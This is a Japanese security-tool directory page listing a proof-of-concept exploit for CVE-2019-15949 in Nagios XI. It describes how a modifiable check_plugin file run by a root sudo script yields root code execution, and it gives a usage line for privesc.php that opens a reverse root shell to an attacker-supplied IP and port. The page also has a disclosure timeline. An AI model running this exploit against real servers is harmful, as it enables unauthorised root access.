Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nagiosxi-root-rce-exploit — Nagios XI (5.6.5) 内の脆弱性を悪用してルートシェルを起動するPOC | Kitploit
ツール/GitHubGitHub/jakgibb/nagiosxi-root-rce-exploit
特権昇格エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubjakgibb/nagiosxi-root-rce-exploit

nagiosxi-root-rce-exploit

Nagios XI (5.6.5) 内の脆弱性を悪用してルートシェルを起動するPOC

リポジトリを見る
1675年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

nagiosxi-root-exploit

概要

Nagios XI <= 5.6.5 には、攻撃者がRCEを利用してrootへの権限昇格を可能にする脆弱性が存在します。
このエクスプロイトを実行するには、サーバーへの'nagios'ユーザーとしてのアクセス、またはWebインターフェース経由でプラグインを管理する権限を持つCCMアクセスが必要です。

詳細

システムプロファイルのダウンロード(profile.php?cmd=download)によって呼び出されるgetprofile.shスクリプトは、パスワードなしのsudoエントリを介してrootとして実行されます。このスクリプトは、nagiosユーザーが所有する'check_plugin'実行ファイルを実行します。 Nagios XIにログインしてプラグインを変更する権限を持つユーザー、またはサーバー上の'nagios'ユーザーは、'check_plugin'実行ファイルを変更して、rootとして実行可能な悪意のあるコマンドを挿入できます。

POC

リバースrootシェルを実現するペイロードをアップロードするPHP POCが開発されました。
使用方法:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port

開示

Nagiosへの報告日: 2019年7月29日
Nagiosによる確認日: 2019年7月29日
修正バージョン: 5.6.6(2019年8月20日)
CVE割り当て日: 2019年9月6日 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

alt text

ツールをダウンロード